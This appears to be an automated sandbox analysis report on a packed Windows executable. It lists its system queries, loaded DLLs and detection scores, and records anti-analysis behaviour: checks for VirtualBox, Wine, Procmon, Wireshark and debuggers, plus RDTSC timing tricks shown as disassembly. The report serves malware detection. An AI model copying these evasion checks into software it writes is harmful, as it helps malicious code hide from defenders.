Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0058255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0058255D
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_005829FF
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Bo6uO5gKL4.exeReversingLabs: Detection: 47%
Source: Bo6uO5gKL4.exeVirustotal: Detection: 44%
Source: Bo6uO5gKL4.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Bo6uO5gKL4.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Bo6uO5gKL4.exeStatic file information: File size 4494336 > 1048576
Source: Bo6uO5gKL4.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: Bo6uO5gKL4.exeStatic PE information: Raw size of nlrwmcpx is bigger than: 0x100000 < 0x1bc800

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeUnpacked PE file: 0.2.Bo6uO5gKL4.exe.580000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nlrwmcpx:EW;gbteqlgw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nlrwmcpx:EW;gbteqlgw:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: Bo6uO5gKL4.exeStatic PE information: real checksum: 0x44ca8e should be: 0x452985
Source: Bo6uO5gKL4.exeStatic PE information: section name:
Source: Bo6uO5gKL4.exeStatic PE information: section name: .idata
Source: Bo6uO5gKL4.exeStatic PE information: section name:
Source: Bo6uO5gKL4.exeStatic PE information: section name: nlrwmcpx
Source: Bo6uO5gKL4.exeStatic PE information: section name: gbteqlgw
Source: Bo6uO5gKL4.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_01889399 push esp; ret 0_3_01889AE2
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_0188B2CD push ecx; retn 0071h0_3_0188B2EA
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_01888AD9 push esi; retn 0071h0_3_01888ADA
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_0188BAD7 push eax; retn 0070h0_3_0188BAEA
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_0187D4F3 push eax; retf 0_3_0187D4ED
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_0187D477 push eax; retf 0_3_0187D4ED
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B8E37 push eax; iretd 0_3_018B9233
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B3CD2 push A4018ACBh; retf 0_3_018B3DBD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B3CD2 push A4018ACBh; retf 0_3_018B3DBD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B3CD2 push A4018ACBh; retf 0_3_018B3DBD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018A48E9 push cs; retn 0071h0_3_018A48F2
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B8A84 push eax; iretd 0_3_018B9233
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B8A84 push eax; iretd 0_3_018B9233
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B8A84 push eax; iretd 0_3_018B9233
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C8595 push ebx; ret 0_3_018C85CD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C8595 push ebx; ret 0_3_018C85CD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C8595 push ebx; ret 0_3_018C85CD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C6F90 pushad ; retf 0_3_018C6F91
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C6F90 pushad ; retf 0_3_018C6F91
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C6F90 pushad ; retf 0_3_018C6F91
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B3CD2 push A4018ACBh; retf 0_3_018B3DBD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B3CD2 push A4018ACBh; retf 0_3_018B3DBD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B3CD2 push A4018ACBh; retf 0_3_018B3DBD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C82FB push ebx; ret 0_3_018C85CD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C82FB push ebx; ret 0_3_018C85CD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C82FB push ebx; ret 0_3_018C85CD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B8A84 push eax; iretd 0_3_018B9233
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B8A84 push eax; iretd 0_3_018B9233
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018B8A84 push eax; iretd 0_3_018B9233
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C8595 push ebx; ret 0_3_018C85CD
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_3_018C8595 push ebx; ret 0_3_018C85CD
Source: Bo6uO5gKL4.exeStatic PE information: section name: nlrwmcpx entropy: 7.955790238153636

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: CD1127 second address: CD112B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E341BB second address: E341BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E341BF second address: E341D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007FAAAD0E3C5Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F200 second address: E4F23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 jl 00007FAAACBBF231h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jo 00007FAAACBBF1F6h 0x00000015 jmp 00007FAAACBBF204h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAAACBBF1FBh 0x00000022 jp 00007FAAACBBF1F6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F37E second address: E4F3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAD0E3C5Ch 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jne 00007FAAAD0E3C56h 0x00000011 popad 0x00000012 jnp 00007FAAAD0E3C58h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F536 second address: E4F53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F53A second address: E4F53E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F53E second address: E4F555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAACBBF1FDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F555 second address: E4F55D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F55D second address: E4F564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4F564 second address: E4F57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAAAD0E3C61h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4FB1D second address: E4FB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4FB24 second address: E4FB36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAD0E3C5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E4FB36 second address: E4FB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E522DD second address: E52301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, dword ptr [ebp+12A328BFh] 0x0000000e push 00000000h 0x00000010 mov edx, dword ptr [ebp+12A329A7h] 0x00000016 call 00007FAAAD0E3C59h 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52301 second address: E52305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E523DE second address: E52411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b ja 00007FAAAD0E3C5Ah 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FAAAD0E3C5Ch 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52411 second address: E52418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52418 second address: E52491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FAAAD0E3C56h 0x00000009 jmp 00007FAAAD0E3C63h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jp 00007FAAAD0E3C64h 0x0000001b pop eax 0x0000001c adc dh, FFFFFF91h 0x0000001f lea ebx, dword ptr [ebp+12BB5202h] 0x00000025 call 00007FAAAD0E3C69h 0x0000002a mov dh, F1h 0x0000002c pop esi 0x0000002d push eax 0x0000002e pushad 0x0000002f jmp 00007FAAAD0E3C62h 0x00000034 jp 00007FAAAD0E3C5Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52580 second address: E52585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52585 second address: E5258A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5262B second address: E52660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FAAACBBF206h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52660 second address: E52666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52666 second address: E5266A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5266A second address: E526C6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAAAD0E3C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+12A31BCDh], edi 0x00000013 push 00000000h 0x00000015 call 00007FAAAD0E3C59h 0x0000001a jg 00007FAAAD0E3C5Eh 0x00000020 push eax 0x00000021 jg 00007FAAAD0E3C68h 0x00000027 mov eax, dword ptr [esp+04h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FAAAD0E3C61h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E526C6 second address: E526FC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAACBBF1FCh 0x00000008 jng 00007FAAACBBF1F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FAAACBBF207h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push edi 0x0000001c jng 00007FAAACBBF1FCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E526FC second address: E5276B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007FAAAD0E3C58h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 0000001Ch 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 mov dx, B92Ah 0x00000024 push 00000003h 0x00000026 movsx edx, dx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FAAAD0E3C58h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 push 00000003h 0x00000047 push ebx 0x00000048 mov dh, 0Bh 0x0000004a pop ecx 0x0000004b call 00007FAAAD0E3C59h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5276B second address: E5276F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5276F second address: E52775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E52775 second address: E5279D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FAAACBBF1F6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f ja 00007FAAACBBF200h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E5279D second address: E527A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E63D6B second address: E63D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E731F8 second address: E731FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3AE1D second address: E3AE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAAACBBF1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7115C second address: E71168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAAAD0E3C56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E71168 second address: E7116D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7116D second address: E7119D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAAD0E3C58h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jnl 00007FAAAD0E3C56h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FAAAD0E3C62h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7119D second address: E711A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAAACBBF1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E712F0 second address: E712FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAAAD0E3C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E712FA second address: E712FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E712FE second address: E71304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E71304 second address: E71310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E716DA second address: E71700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FAAAD0E3C64h 0x0000000f jmp 00007FAAAD0E3C5Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E71700 second address: E7170B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FAAACBBF1F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7170B second address: E71711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E71C99 second address: E71C9F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
